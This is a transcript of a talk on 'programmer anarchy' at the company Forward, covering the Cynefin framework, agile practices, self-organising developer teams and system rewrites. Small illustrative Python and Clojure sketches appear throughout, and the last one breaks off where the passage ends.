Generally, we blow the estimates pretty badly that way. So we're successful. And I sort of say, well, why is this working? What are we doing that's making this work? And fortunately, another guy who reads books came and visited us and talked to us about some stuff. And one of the things that he gave to me was this concept of the Cynefin framework. This Welsh guy who worked for IBM for a while came up with an idea of how to classify problems. So I watched some of his videos. The guy's name is Dave Snowden. His videos are on YouTube. They're very interesting to watch, especially the one about birthday parties and how you organize birthday parties. It's quite silly. He published an article in Harvard Business Review about his work. It was unique in the annals of the Harvard Business Review, because the editorial usually talks about all the articles, but in this particular issue of Harvard Business Review the editorial only talked about his article, the first time ever that had happened, because they thought it was that profound. So what he basically said was, you can sort of divide the world up into various types of problems that exist. And I'm grossly simplifying this. But he said basically the world consists of things like simple problems and complicated problems. And they have some key characteristics. A simple problem means the cause and effect relationship is very clear to see. If I stand here and move my mouth, you'll hear me. If I turn the switch on, the light goes on. If I turn it back off, the light goes off. Very, very simple understanding of problems. Complicated, there's still a cause and effect relationship, but it can be quite obtuse. It could be a long chain of events to get there. But he said those aren't all the types of problems there are. He said there are actually problems where there isn't a cause and effect relationship that you can discern ahead of time. As much as you want there to be one, there isn't. And he called these complex, not the best word compared to complicated in my mind, where you can't see the effect. Now you might be able to look afterwards, something happened, and say, oh, this happened because of this reason, but it gives you no valuable information for tomorrow's decision. He says there are problems like this. And he says there's chaotic as well, where you have no idea what's going on. Now I found that kind of interesting, because to some degree he really points out that almost all the problems, 85% of them, he says, start out in what he calls disorder. You really have no idea which of them it really is. And he said your tendency, unfortunately, is to claim that it's like the one you like to work in. So if you're a politician, oh, I'm sorry, every problem is simple. Just let me at it, I'll make it work. You give us money, we'll make the banks happy. It's a very straightforward problem. It's not hard at all. Of course, it's not true. But the tendency is to sort of drag the problem to where you want it to be. So essentially you have to be very careful. If you're comfortable with a particular type of problem that you like solving in one of these classifications, you will tend to look at every problem and say, oh, it's just like that. It's simple. Or it's complicated. Or maybe you love the chaos. He says, if you're very careful, there are ways to look at a problem and measure it and analyze it, and it will tell you what type it is if you listen. So again, some nice videos on that. 
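To keep those categories straight before the organizational-structure discussion that follows, here is a minimal reference sketch, in Python, of the four Cynefin domains. The sense/analyze/probe/act decision patterns are Snowden's standard formulations rather than anything stated in this talk, and the example strings are just shorthand paraphrases of Fred George's illustrations.

```python
# A minimal reference sketch of Snowden's Cynefin domains, not something from
# the talk itself. The decision patterns are Snowden's standard phrasing; the
# examples paraphrase the illustrations Fred George uses above.
CYNEFIN_DOMAINS = {
    "simple":      {"cause_and_effect": "obvious to everyone",
                    "decision_pattern": "sense, categorize, respond",
                    "talk_example": "flip the switch and the light goes on"},
    "complicated": {"cause_and_effect": "discoverable but obscure; needs experts",
                    "decision_pattern": "sense, analyze, respond",
                    "talk_example": "a long chain of events; experts can trace it"},
    "complex":     {"cause_and_effect": "only visible in hindsight; no experts",
                    "decision_pattern": "probe, sense, respond",
                    "talk_example": "pull a lever, see whether it makes money today"},
    "chaotic":     {"cause_and_effect": "none discernible",
                    "decision_pattern": "act, sense, respond",
                    "talk_example": "no idea what's going on"},
}

for name, domain in CYNEFIN_DOMAINS.items():
    print(f"{name:12s} {domain['decision_pattern']:28s} {domain['talk_example']}")
```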
There's another video that I actually found quite useful, and he said, oh, by the way, different organization structures match these types of problems. The organization structure itself is relevant to what type of problem you're trying to solve. And so as I looked at this a little bit, I drew some pictures for you guys. Simple. That means there's a clear cause-and-effect relationship. OK. This is where you get a bunch of guys. You give them a little bit of training. Put some managers up there who really understand it. Make sure they do better and better. You can measure them. You can count them. You can make them go faster. This is the world of the simple problem. So this is actually the correct structure for working on simple problems. One of the things Forward has is a call center. Our call center is actually organized this way. It turns out that's the right way to organize it. What about some of these others? What about complicated? Remember, with complicated the cause-and-effect relationship is very obtuse. It's very long, long-winded at some level. So what they suggest is you need experts, because they understand the cause-and-effect relationship. Of course, experts are expensive. So in order to execute the ideas of the experts, I need to put those grunts back in place again. We'll tell them actually how to do it. But the experts will tell you how to do that. Now this is beginning to look like architects and developers. For certain problem domains that are complicated like this, this actually is the correct organization structure. Put tiers of expertise in place. You basically want the management then to make sure they just execute what the experts tell them to do. Don't worry about it. Whether it's right or not, the experts have told us to do it that way. Now you move over to complex. Remember, there is no cause-and-effect relationship here. There are no experts. What you wind up having is you basically just want to turn a lot of bright people loose saying, make it work. Make me some money today. And they've got to be very catalytic about this. They could pull this lever today and make money. Pull it tomorrow. Make more money. Pull it the third day. Lose money. Ooh, stop pulling it. They just have to have almost no memory about this stuff. In other words, I can't create this expert. And so there's no reason to have some sort of manager telling your experts how to do the work, because he doesn't know either. They don't know. Now a lot of problem domains fall into this. And in fact, this tends to be the area where we as Forward like to play. We play in this area because it's hard. We play in this area because when things are hard, the opportunity for profit is very, very high. When things get to be routine, like when you can move over to complicated and just have experts to tell you what to do, then all of a sudden the profits tend to drop in those sorts of domains. This is sort of Economics 101. So it turns out most of the problems we tend to solve are in the complex domain. So hence some of the things we're getting to are because we're trying to solve this sort of problem. So where do we fit on the agile scale? Well, the Agile Manifesto has just celebrated its 10-year anniversary. I didn't realize actually that Uncle Bob actually called the original conference for that. I was at the conference the year before that. But we came up with this and we all believe this. I mean, this is fundamental to how we work as well. So we believe in the Agile Manifesto. 
My favorite list of things is actually from Kent Beck's books about sort of what I would consider to be the XP values, feedback, communication, respect, courage. These things I think are very powerful. We love these things. And then you get to a list of the various common XP practices, stand-ups, narratives, estimates, patterns and the like. Well it turns out this is a list of things we don't do. So how do you handle the agile manifesto? How do you say yes to that? How do you say yes to the XP values and then cross all these things off the list? This is what I'm here to tell you about as we're trying to solve these complex problems. So I got gray hair. I've been doing this quite a while. One of the things I've seen across my career is a shift in trust between ourselves and our customers. And we certainly had that a long time, you know, a great, great extent back in the dark ages. But more recently, especially since we put waterfall in place, to some degree I feel the trust relationship has gone downhill. Now part of this is because yes, applications got bigger, we started doing things offshore, customers got no demand because of the environments, lots of reasons. But some degree the trust between ourselves and our customers was getting worse and worse. It was more like sign yourself in blood, you're going to be absolutely committed to this and your job's on the line. All these sort of words are driving the trust the wrong way. What we found out though is when we moved to Agile, we started trying to reestablish that trust. Then we started having conversations with our customers. But there's a gap there. In fact, one of my colleagues pointed this out and says, this is gap between all these things. And when I say Agile, by the way, you put any label you want to on it, I think we re-labeled this all the time, sells more books, causes more conferences. But in fundamentally it's basically all the same sort of thing. It's about constant feedback, about getting your customer face and really understanding what they want to do. But there's a gap there. And you call it sort of a cultural gap. Because to some degree the organizations that are currently waterfall cannot automatically do anything. Remember there's a gap there. They want to be effective at Agile. You have to have a certain level of trust with your customer. But they're down there. They're not ready to take that leap. I've done a lot of consulting in Agile space over the last decade. And the only time I can really make this leap successfully is when the company is in deep trouble. Because they're forced to trust me because otherwise they're going to go out of business. Or the guy's going to lose his job. Or one of these other nasty things is going to happen. That becomes a very receptive customer. Because I have to bridge this gap. When I try to work with successful companies, it's making a lot of money and they're down on the waterfall curve, it's almost impossible to push them up. They don't want to go. They're making money. Why should I take this chance? There's a thousand reasons. But there's even more reasons. Because to some degree waterfall has baked in structures into the organization that makes it difficult to move into this Agile space. So we talk about a couple of those. For one thing, I'm going to try to interact with the customer a lot. They're used to me actually saying, oh, what do you want next year? Here's my next delivery date, June next year. What would you like us to do for June? 
Write it all down in a document, sign it in blood and go away. Now why do they do it that way? Well it turns out that's what we taught them to do. We as programmers taught them that's the way you should interact with us. Tell us what you want and go away. We don't want to be bothered anymore. Trust us we'll deliver it. Of course the trust is going the wrong way. So we're going to interact a lot more with you. We want to do that. That's different for them. It's like, what are you going to do next June? Don't worry about June. What about next week? What do you want next week? Well, I don't know. I have to check. It's like, no, no, I need to know right now. It's a whole different style of interaction. Obviously it hits your process books. You've got books and books about how to do process. All those kind of go out the window. And interestingly enough, we also begin to have fewer roles. We have tons and tons of magic roles. I was with one client, they had 350 people in the IT shop, 180 job titles. That spawned from the waterfall world. Now they knew that was wrong. And they were radically revamping that to be five. And it was applauded their effort because they really didn't understand how ugly that was. So let's get an example of that. When I talk about agile, I generally define that there's three major roles of that. There's management roles, there's business roles, and there's development roles. And we have lots of titles for people that we sort of stick in these various categories. Project manager, iteration managers, you know, business analyst, customers. I always put the QA guys in the business side because they're always testing at the business level when they're doing their acceptance test. And there's just tons of titles for developers. They just, I could write all day long new titles for developers in various sundry ways. With agile though, we've done a pretty nice job and Scrum talks about this originally with the concept of there's only team members. And we took all those roles and we kind of stirred them into just one big role called developer. And a lot of agile shops, as they get mature in their agile, you know, they should begin to shed the titles. I was certainly saying in my company now, nobody knows what everybody is. Somebody has a title somewhere in the database. Nobody knows what they are and nobody cares. That's very much how we're working. So how does this stuff we're doing in Fort, map to this? Basically the way we're working now, we require yet a higher level of trust for our customers. We're asking our customers to trust us even more than they trust us with agile. And we basically have created yet another cultural chasm that we've had to leap over. And it's been somewhat painful sometimes, but we've managed to make that leap. We're asking them to trust us more than ever before. Now why is that? So let's go back to our agile roles, just as a starting point for examples. So you know, these are good agile roles. We have customers, project managers, business. So you really get down to a nice lean sort of agile organization. You'll see these sorts of titles. And yes, we have customers and we have developers, but we don't have the other roles. The other roles have gone away. Again that level of trust that we're going to need. In fact, even more in particular, we actually don't have any managers or programmers at all. You first of all talk about self-organizing teams. We're it. We do it. So pretty radical sort of thinking of an organization. 
Again, an organization that has people in these roles, going to have to have a trust to go up the next level. I mean, who's talking to the business? Well of course the programmers are talking to the business, but don't you need a business analyst in there to talk? No, no, I don't want that level of conversation. I want you to own the problem. And so we've done that. So there's some names for this. This is not the first time this sort of happened. This was, I think it's actually the all-time worst name, developer-driven development, 3Ds, right? It's actually pretty good description, but it's just a horrible name. More accurate is a bit called open source business model. If you ever work with open source projects, I'm sorry, who's the project manager? Where's the BAs? Where are the testers? Basically it's a self-organizing group. Develop some of the developers own it and other developers are contributing and they may gate themselves up, but they may add somebody's contributor and make somebody decide they don't want to play anymore, they drop out of it. It's a very dynamic organization and yet very effective. So it's a pretty good analogy to that. I've chosen to call it programmer anarchy. We can talk about later maybe why that was a good or bad name, but why do I choose the word anarchy? Well, to some degree, again, I've been around a long time, I've heard the word empowerment all my career. Oh, you're empowered to make these decisions. Some of the speakers I've heard about this week talk about that and how that's not a real thing and I believe that. Somebody's got to give you that. But if they give it to you, then they can probably have the power to take it away. You're always learning over that boundary is between the two. Where is that point where I'm going to step over the line all of a sudden, no, I can't do this anymore? And it sort of leads to, well, can I do this and you start asking permission rather than just acting? I don't want that environment. I don't want the uncertainty associated with that. I don't want the idea that empowerment is just a way to say, oh, I'm going to blame you if it doesn't work because you were empowered. I don't, somebody says you're empowered. I'm like, uh-oh, you're trying to find somebody to lay blame on. And in fact, a lot of times that's what happens. So I call anarchy. Well, in anarchy, there's a concept that says there is nobody to ask. So where's the boundary? Wherever you want to put it. Now there's a corollary to that. If I can't ask, if somebody can tell me what to do, then by the way, I can't tell you what to do either. Which means all of a sudden you and I may not agree. Well, government, how are we going to resolve this? The answer is why bother resolving it? Let's just go with it. If you don't like how I'm doing it, you do it. And we'll both do it. We'll see who wins. But there's nobody to ask permission of. So we expect to have disagreements. We are not trying to resolve them. If you want to try to resolve all the disagreements, oh, you should not use Ruby. Oh, no, no, you should use closure. You want to try to resolve these, you've got to put somebody in charge. And then of course they're going to set rules and boundaries and all of a sudden you're back in the waterfall. You can creep back there very, very quickly. So that's why I call it anarchy. And of course anarchy in the classic definition of anarchy means an organization who organizes themselves. An organization that's not imposed upon them from the outside. 
There's a really interesting book called The Invisible Hook. It describes the organizations of pirates. Forgive me, pirates were not organized. It wasn't a pirate manual. There wasn't some country saying this is how you have to organize your pirates. And in fact pirates had a very sort of dynamic organization. If you were traveling from spot to spot, there would be one guy in charge who's really good about organization and navigating. When you're lashing to that ship and trying to attack it, there's some giant guy with a bunch of swords that's the guy now in charge. And they would dynamically float the organization accordingly. So they were in every sense anarchists at that level. So how do you match up the work to the people in this anarchy environment? Well to some degree, I go back to some tools I used to use when I was doing more agile projects. I always tried to match up the people to the stories. Now I don't do this at iteration planning time. In fact iteration planning is gone from my vocabulary. I haven't done it since iteration in about three or four years. So what I like to do is I like to every morning I stand up, match the people to the projects. So what stories are the most important things? I want to judge that every day. So we go to our card wall, we look at the stories up there. I look at it and it says, okay, what's the most important story to work on? Okay, it's that one. Okay, next thing is who showed up today? Because I have no idea that you're going to get sick tomorrow or you're going to die or you just don't want to show up to work. I have no idea what's going to happen. If you show up, I want to put you on the most important thing that you could possibly work in. So I match the work to the people on a day-to-day basis and do that at the stand-up meeting. That's what the stand-up is all about. So let's see who's there, let's hear about what happened yesterday and then let's decide the work. I don't want somebody in the stand-up to come up and say, oh, I'm going to work on this today. So no, no, no, stop. Let's see what's the most important thing to work on. It may not be the same thing as yesterday. Let's judge that on a day-to-day basis. So we want to be fluid in that way. So we kind of extended that model into anarchy as well. So basically we say now instead of having stories to work on, there's various projects in our organization. So you can see from the little logos, we have easily eight or nine projects. In fact, we probably have twice or two or three times that many going on that haven't surfaced yet. So there's lots of little projects running these covers. The priority of those projects is set by the business. In fact, our managing director at some overall level says this is more important than this from a business perspective. We as developers respect that. On the other hand, who should work on any given project? It turns out the business owners are not the best people to decide that, oh, you're the best database person. Come work on the project and I need your web skills. Programmers know who the best people are. They know the best people are. And none of that, they probably know when they can roll themselves off much better than the manager. So don't let the project business owner sort of decide on his magic spreadsheet, oh no, I can't let this guy go because he's a one in my spreadsheet and I have a bunch of ones and they add up to six and I need to keep six. We've killed that spreadsheet arithmetic, the spreadsheet nonsense. 
People don't need to be there anymore, they should go away. And that's what we do. And we call this a resource rumble. Rumble is a slang term in the US for sort of getting together and having a fight. You know, it's two gangs going to get together, we're going to have a rumble. Nobody gets killed. But we have an interesting discussion, what's the most important thing to work on? And we sort of have that dialogue and we talk about who we need to slide over and maybe some skills we're missing. That's a discussion we have. And we have that almost on a weekly basis and we have it ad hoc all the time. So we decide what the priorities are and with that the programmers can go around and organize themselves around the most important things for the business. So that's how we assign the work. Again, who is, who makes the decision about who works and what project? The developers themselves because they know their skills the best. Okay. So some side effects of this. I have something I call story tyranny. So let me describe how the environment looks like. Developer is driven by stories. The stories are small. Customer decides what's the most important thing to work on. We estimate things by stories. We measure stories. We count stories. It's all about the stories. We estimate, we start talking about velocity. It's all about the stories. So sound familiar? Hopefully. Problem is this is the developers in that environment sort of become drones. They're not really worried about the business problem. They're going where they're told to. If I have an idea about doing something, no, no, no. This is the most important story to work on. I need you to work on the story. But this may be a bad idea. No, I'm sorry. It's not a bad idea. It's my idea. I'm the customer. You can have a vote. Do it the way I say it. Do it. Well, I think we need to explore this option. Oh, no. No, no. Don't explore options. This is the most important story. When are you going to have it done? Story tyranny. In fact, we were getting to have some of that in the organization. And that drove a lot of the changes we had in our processes because I was watching this. And these guys were not happy developers. They were in agile space. I was supposed to make them happy. They were not happy. So story tyranny. So interesting enough, I go back and again, sort of draw conclusions historically, we have shifted the responsibility for making decisions radically. I can tell you, in the dark ages of waterfall, the trust relationship just did not exist. The customer said, do you do this? There was almost no feedback mechanism. Because first of all, it was usually months and months between the time that some guy wrote a spec and signed it off and the time I actually saw it as a developer. And we'll be done to you to try to go back and question one of those things. Imagine the meetings and the reviews and we're going to write some new documentation. When is it going to be ready? And can we have another review of this stuff? It's like, you try that once or twice and you as a programmer stop trying that. It's just like, tell me what to do. I'll just do it. That was the world I grew up in in waterfall. Now we moved to much more collaborative, almost constant collaboration with our customer in the agile space. And this is responsible in my mind for a lot of the improved delivery, delivering more with our customer once and the like. Well, it turns out though, in anarchy, we flip it the other way completely. 
We want the customer to say, what are you trying to accomplish? Get out of my way. That's where the extra level of trust is required. That they're not going to try to micromanage what I'm working on. They're not going to try to decide you have to have stories. They're not going to ask for story estimates. They're not going to track me on stories. They're going to say, here's a feature I'd like to have. The business has set some priorities between the various projects. And it's like, okay, get out of my way. We're going to make it work. We may try some experiments. We may do some other stuff, but get out of my way. We're going to do it. Another level of trust. Just to get an idea of how this works, of course the anarchists themselves in forward have their own website called Forward Technology Co. UK. There's a lot of nice information on that. They do have their own little tech conferences every month. They get together and have some beer and pizza and present to each other like in a technical conference. And I can tell you, some of the presentations are extremely strong and very informative. So one of the things they do is they actually track through GitHub how much they're doing. And so I think this is a week I snapshot a month or so ago. It says, the last seven days, 53 developers have made 882 commits resulting in 652 deployments in that week. Do the arithmetic. In your 40-hour business week, they were deploying on average every three and a half minutes. They were putting something live into production. This makes the trust relationship work very nicely because they're constantly delivering to the customer. He's seeing what it is. We're trying experiments. The cost of an experiment is considered very low. Let's try an idea that's fine. It works. It doesn't work. They're constantly producing and delivering. So that turns out to be a very key aspect of making this work is how fast can I deliver. Now you take all of the agile practices and various processes, you know, starting with Scrum at one end and this cycle time, and you sort of get the XP and this faster cycle time. One of the things I've seen over the last dozen years is the cycle times for agile are getting faster and faster. But also, we're having more and more role collapsing. I can't go really fast if I have to go talk to him and him and him before I get an deployment done. So hence, the teams are beginning to blur a little lines. The line between myself and my operations team is now completely gone. There's no operation guys responsible for deployment. They're only embedded into the development teams. They write code themselves. Developers deploy. Welcome to Amazon Cloud. Welcome to Heroku. I mean, it's not that hard anymore. So we take advantage of that because we want to go fast. If it makes us go faster, we will do it. So let me give you some examples of anarchy in action. So USWH was one of our acquisitions. We bought that company, well, I guess two and a half years ago now. They had a classic.NET stack. I mean, web servers, app servers, SQL servers. They had a farm of machines. They had extra machines in case for heavy loads. It's supported the energy market. It turns out the energy market, if you get some bad energy news like, oh my goodness, prices are going to go up, our website gets an order of magnitude increase of traffic. So we had to allocate machines for that. And the trouble was, it was getting a little old because this is the company we bought was actually 10 years old at the time. 
And what really worked nicely back then wasn't working so well. In fact, programs were afraid to touch it because it might impact this and impact this and impact this. And we were doing some very strange things. And our cycle times were horrible. So we decided we need to rewrite the energy program. And we call it energy revolution versus rewrite because I don't want the same architecture structure, I want a different structure. So we basically went and grabbed a couple of guys off a team we really liked and took this.NET SQL system. Now one of the things that I was taught in business school, and I do have a business degree, is that you always have to watch out with technology. You got to be careful not to introduce too much new technology to a project. One new technology, fine, two, okay, maybe. Any more than that, you're going to kill yourself because the technology will come up and bite you. So with that in mind, and with the.NET background SQL server, what do we do? Well we build a new system in four different new languages, use two different new databases including a non-SQL database, and a whole different way of doing pages. And never missed a beat. There's no way if I was in charge of this project I would have ever let this happen. It turned out it was exactly the right thing to do. We started using Ruby for front-end work. We started using Clojure for back-end processing stuff. We used a little C++, you know, mixed in where you need to grab an external service, and that was the best way to do it. A lot of traffic monitoring with Node.js. By the way, the programs were enthralled with this. I mean, I get to play with my favorite toys. I get to try new things out. They were absolutely delighted in their productivity. It was amazing. Never missed a beat. Another example from Energy Revolution. Again, remember, we're trying to rewrite this system. That's the goal. It's a 10-year-old system. So one of the things we have to do is we have to calculate the energy options you have to switch energy plans. And it turns out in the UK that it depends upon, well, what's your history of energy usage? Well, where do you live? Because every energy company has different plans for where you live so they can optimize their profits. What plan are you currently on that may or may not be a good deal for you? And based upon that, we'll come out with a list of these plans are appropriate for you. So a good, nice function. We wrote that in Ruby. It used to be scattered across all of the.NET layers like it was supposed to be. You could never find the algorithm. We managed to tease it out. It's like 600 lines of Ruby code. And there was a huge improvement because there it was. There's the algorithm that figures all these things out in one spot. So of course, at that point, what do you do? You rewrite it in closure. Because the guy's heard about closure, he said, oh, it looks like a function. This looks like a function. I'm taking this arrays of information. And besides, you get some more arrays. Sounds like Lisp to me. Let's try it with Lisp. And we wrote it in closure. And lo and behold, it was smaller. It's like 300 lines of code now. So what do you do now? You write it again in closure. They said, well, excuse us, but we really didn't know how to use closure very well. That was not necessarily good news to hear. But OK, we don't know how to use closure very well. We can rewrite it again. So we rewrite it again. Now it's only 200 lines of code. 
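To make the shape of that plan calculation a little more concrete, here is a minimal, hypothetical Clojure sketch of that kind of plan-eligibility function. The plan names, fields and pricing rules are invented for illustration and are not Forward's actual code or data; the real logic around regional tariffs, usage history and the customer's current plan is obviously far richer than this.

    ;; Hypothetical sketch only -- invented plan data, not Forward's code.
    (ns energy.plans-sketch)

    (def plans
      ;; each plan: regions where it is sold, unit rate (per kWh), yearly standing charge
      [{:name "Fixed Saver"   :regions #{:london :midlands} :unit-rate 0.14 :standing-charge 95}
       {:name "Variable Lite" :regions #{:london}           :unit-rate 0.16 :standing-charge 60}
       {:name "Green Online"  :regions #{:midlands :north}  :unit-rate 0.15 :standing-charge 80}])

    (defn annual-cost
      "Estimated yearly cost of a plan for a given annual usage in kWh."
      [plan usage-kwh]
      (+ (:standing-charge plan)
         (* (:unit-rate plan) usage-kwh)))

    (defn eligible-plans
      "Plans sold in the customer's region that beat what they pay today,
       cheapest (biggest saving) first."
      [{:keys [region usage-kwh current-cost]}]
      (->> plans
           (filter #(contains? (:regions %) region))
           (map #(assoc % :estimated-cost (annual-cost % usage-kwh)))
           (filter #(< (:estimated-cost %) current-cost))
           (sort-by :estimated-cost)))

    ;; e.g. (eligible-plans {:region :london :usage-kwh 3200 :current-cost 560.0})

The appeal of this style is roughly what the speaker describes: the whole calculation is a pipeline over plain data, which is part of why each rewrite came out smaller than the last.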
Now it actually does something the old system was supposed to do, but never did. And it's absolutely gorgeous. It's absolutely clear. In fact, we put this code under load when we had one of these big energy spikes. The big energy spikes started taking down our .NET farm. We were getting hit much harder than we ever expected to, and we started rerouting the traffic over to this calculation engine. So running on one virtual machine in the Amazon cloud, it got all the way up to 30% utilization to take all the load that the other six machines were dying on. In other words, it was absolutely the right decision to make. The programmers made a great call in writing it that way. So the question I have is, what manager in their right mind, charged with rewriting the system, would let a programmer rewrite this thing three times? The answer is: that's why you have no managers. I was giving this presentation the first time at a conference, a very small little conference with some very bright people. One person just stood up and said, I mean, why did you let them do that? And I said, exactly. I would not have let them do that myself. I confess to that right now. I would not have let them do that. And it was absolutely the right call. All right, one more example. We make a lot of money off of understanding where people are clicking. I mean, that's what internet advertising is all about. And the old system — we ran this as a Ruby-based system. We wrote some Ruby code, 32 different servers in the cloud, 40% utilization. It's making us lots of money. In fact, if the system goes down, we're losing 200 pounds of profit a minute from this thing being down. So it's a very important system for us. So, of course, what do you do? You rewrite it. We wrote it in Node because we wanted to play with Node. It sounds like a good idea. In fact, Ruby has some trouble when you're trying to deal with several Asian languages — it has some problems with some of that stuff — and JavaScript doesn't have that problem. So now all of a sudden we reduce the number of servers; now we're down to 22 servers. The utilization went way down, even on this smaller number of servers, and even more important, the latency actually dropped. So, again, why would you do this to your running system? It's not that old. It's only a few months old itself. Why would you rewrite it? It turns out it's a good call. The programmers made a great call again. So you're getting a sense for just how strange some of these things look when you turn them loose. They do things you would think were counterintuitive, but you need to trust them to do that, and that's what we're doing. So, some of the things we have in our company that sort of make this happen — I call these the enablers. I don't think this list is everything you need. I think you can do it with less than this list is showing. But these are the things we have going forward that probably contribute in some way to doing this. Overarching in my mind is this phrase from Frank Herbert in the Dune books: fear is the mind killer. I truly believe that programmers that are afraid will not make innovative decisions. They will hesitate. They'll take the conservative way. They'll back away from the problem. So you try to eliminate fear. Now, fear can creep in in very strange ways. In fact, even some good advice from various Agile experts I think is horrible. For example, in the original XP book, they say you should make a story-level estimate at the beginning of an iteration.
And I'm like, oh, what a bad idea. Well, what does that mean? Well, here I go to you and say, OK, tell me how big this story is going to be. You're going to own the estimate for this, per Kent Beck's XP. Well, how big is it going to be? You're thinking, OK, we're going to pair on this. If I pair with the idiot over there, it's going to take me five days. If I pair with the wizard over here, it's going to take me one day. So what am I going to say? Am I going to say one, or say five? If I say five, they're going to think I'm an idiot. If I say one and I get stuck with the idiot, I'm going to fail. So what am I going to say? I'm going to say, OK, we're going to pair. So what happens next? OK, we're starting the iteration. Here, come work on my story, because I want to make sure mine gets finished. Even though it may not be the most important story, come work on my story. Trust me, I'll come work on yours when we're finished with my story. Again, not a good allocation of resources. All because I asked the question: tell me how big this is going to be. You own this. You're responsible for it. You're empowered to make the story work. It's fear. So when I see fear in an organization, I can almost guarantee it's created by process breakdowns. You can trace it back to some of those questions. One of the things I actually work on very hard is: when you ask me a question, I want to know how you're going to use the information I'm going to give you back. What are you going to do with this? I had an occasion where we were doing a fixed-price project, and we had part of our work being done in India. And the client sends some sort of guy over to our team and says, okay, I need to know who's working on this project in India. Okay — it's like, if I tell him this, it's probably going to lead to yet another question, and then another question. So I'm like, what do you need this for? How are you going to use this information? Well, I don't know, he says. When you know that, come back and ask me again. His manager shows up: I need to know who's working in India. And how are you going to use this information? Yeah, not really sure. When you find out, let me know, I'll give you the answer. He never came back. Now, I can guarantee if I had told him the answer, they'd probably have done some calculations in the back office, figured out what rate I'm getting in India, and they would have tried to renegotiate the fixed-price contract. I mean, there would have been meetings for the next four months trying to get this thing straightened out, all because I answered a question without knowing how they were going to use the information. So be very careful about such things. So fear is the mind killer. One of the things I spent a lot of time on with that organization was trying to find the fear and kill it. All right. So what about our company? One of the things about our company you should understand is we love taking chances. We're gamblers by our very nature. Our founder is a gambler by his very nature. I think that's why he gets the excess profit. He's always willing to risk. He originally bought keywords back in the dark ages. He knew he'd go find 10 keywords to bid on on Google, and eight of them are going to lose money and two are going to be successful. And it's all about finding the two as fast as you can and killing the other eight. So he's used to very, very low success rates. He's willing to gamble because he knows the returns are good.
That's his nature. And frankly, we're making a lot of money, which means you can hide a lot of mistakes. When mistakes happen, it's like, oh well, let's try it again. Just roll the dice again. So that is part of our culture. We're risk takers. And that enables a lot of this thinking. We have become very developer focused. When I joined the company, I was actually the first experienced developer they'd ever hired. And then we started hiring more. One of the things we have as developers is we now have very clear ideas of what success means, and in our world success is business success. So as we bring people into our team, the first thing we care about is: okay, what's the business metric? Is it making money, is it clicks, is it response time? What is the metric we measure? That's what we want to see. We measure against that. We worry about success ourselves. That's part of our culture. In fact, we put those charts up in big places. We measure them ourselves. The first thing when we come in every day is: how much money did we make yesterday? Programmers ask these questions. They care. The other thing is, we respect each other, which means these disagreements we have, we can have them and still go out later and get a beer together. It's okay. We do respect each other. Now, how do you think we hire in this environment? Well, the only people who can decide who's going to join the programming team is the programming team. That's what anarchy is all about. Now, an interesting thing happens when you start eliminating titles, wiping them out, and you have this sort of hiring model that says programmers pick their colleagues. Well, if you really do like to learn, who do you want to hire? I want to hire this brilliant guy over here because I can learn something from him. What if I'm in a title world? If I'm in title land, I want to hire somebody over there who's not very smart, because he's going to make me look better and I get promoted. Now, from an organization perspective, do you want the really bright guy or do you want the idiot? In title world, you're going to tend to pick the idiots. We want to pick the bright guys. So in almost all the interview processes, we're trying to see if you know something we don't know. If you know something we don't know, we want you to come join us, because this is cool. So our hiring is along those lines. And again, of course I respect you, because I wanted you to come join us. You've got things you can teach me. The programmers themselves work in that fashion. In fact, the programmers themselves came up with this concept. They call it: experimentation drives innovation. That's their way of expressing themselves. I love that because, by its very nature, experimentation means failure — constant, constant failures. It's expected. We don't get upset when it happens. And that drives everything else. Then my favorite: do or do not, there is no try. Yoda, good philosopher that he is. If you're not failing, you're not trying — all these things are sort of along the same lines. We expect failure. At any given point in time, probably two-thirds of the developers are experimenting on something that may make us money. In fact, most of them will not make us money. We've lost our productivity for that day. We don't care, because when they win, we win big. We've had a lot of wins. Finally, we actually hired a VC into our senior management team because we were making a lot of money.
We wanted to try to find other places to invest in, other sort of businesses to get into because we, again, we don't care what businesses we're in as long as we get a chance to innovate. He started out his presentation. The first time he was introduced to the people saying this, the greatest barrier of success is fear of failure. He came back to the fear issue as well. So at the top level of the business, they really do believe that fear is a problem. And failure should be not only, not only happened and acceptable, it should be expected that we will fail in various things we try. So those are the cultural enablers that allow us to play these very, very strange games. So if I go back to the best practices, you can begin to see why some of these things get scratched off the list in this environment we're in. So first of all, you can sort of scratch all these off because basically the programs themselves trust each other. They're very outspoken with each other. I don't need a whole retrospective to give them a chance to sort of say they don't like something. They'll say it all the time. They don't like it when you say, well, why are you asking me? Why are you doing this anymore? You're doing something else. And they change their minds. Even concept of stories. Remember, I'm reversing the power structure here. As far as I'm concerned, the business is saying this is my objective. This is a feature I think we should have. And the program is saying, OK, if that's what you want to have, let us figure out how to make it work. If we want to create stories, we'll create stories. If we don't want to create stories, we won't create stories. This is our problem to manage. So formal stories and those sort of things. Stand up. That's just a chance to make sure we talk every day. It's a great tool to make sure your team talks once a day. If they're talking all the time, you don't need stand up. In fact, if there's any word that sort of, any meeting is basically not a productive exercise. It's something that's a crutch for something that's broken. And that includes retrospectives, meetings. It includes stand up meetings. It includes iteration planning meetings. If you're really running effectively, these things will fall away in the due time. Let them go away. All right. Estimates, iterations, mandatory pairing. Again, a lot of this is associated with making sure we know who to blame when it doesn't work. So we come back at iteration. Well, how many stories should get done? I can't tell you how many clients I've had. It says, oh, we should get 12 stories done this iteration. We come back at the iteration. We get 10 done. So how many should it be the next iteration? I'll tell you, the project manager will say 14. The 12 of you are supposed to get done and the two you owe me. And I'm saying, excuse me, this team does 10. We just learned that. You aren't going to use that. No, no, not 10, 14. Again, something you don't need creates fear. Just idiocy at some level. So we don't have those because we're not, we're very results oriented. We're looking at the business metrics. And do we have a win yesterday based upon the business winning? Not based upon any other metrics, story points, anything else like that. So they'll go away. If you happen to attend my talk on Wednesday where I talked about microservice architectures, you sort of understand why I scratched all those things off. Our applications right now are extremely tiny. We typically write, most of our applications are probably 100 lines of code. 
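To give a feel for what one of those hundred-line applications might look like, here is a small, hypothetical Clojure sketch of a JSON-over-HTTP service of roughly that shape. It is not one of Forward's actual services: the endpoints and data are made up, it assumes the Ring and Cheshire libraries are available, and the document store the talk mentions (MongoDB) is stood in for by an in-memory atom.

    ;; Hypothetical sketch -- invented endpoints, not an actual Forward service.
    (ns tiny-service.core
      (:require [ring.adapter.jetty :refer [run-jetty]]
                [cheshire.core :as json]))

    (def clicks (atom []))   ; stand-in for the real document store

    (defn handler [{:keys [request-method uri body]}]
      (case [request-method uri]
        ;; record one click event posted as JSON
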